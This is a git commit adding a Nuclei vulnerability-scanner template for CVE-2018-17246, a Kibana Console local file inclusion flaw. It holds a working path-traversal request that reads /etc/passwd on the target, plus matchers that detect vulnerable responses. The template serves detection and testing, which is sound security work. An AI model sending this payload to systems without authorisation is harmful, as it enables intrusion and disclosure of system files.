Merge pull request #1235 from projectdiscovery/princechaddha-patch-10

Create CVE-2018-17246.yaml
2021-04-21 23:43:01 +05:30 · 2021-04-21 23:43:01 +05:30 · bc4e678ed1
parent ee5329d77e a4ab51f7de
commit bc4e678ed1
1 changed files with 33 additions and 0 deletions
--- a/cves/2018/CVE-2018-17246.yaml
+++ b/cves/2018/CVE-2018-17246.yaml
@ -0,0 +1,33 @@
+id: CVE-2018-17246
+info:
+  name: Kibana Local File Inclusion
+  author: princechaddha
+  severity: high
+  description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
+  reference: |
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-17246
+    - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
+  tags: cve,cve2018,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "\"message\":\"An internal server error occurred\""
+        part: body
+
+      - type: word
+        words:
+          - "kbn-name"
+          - "application/json"
+          - "kibana"
+        condition: and
+        part: header
+      - type: status
+        status:
+          - 500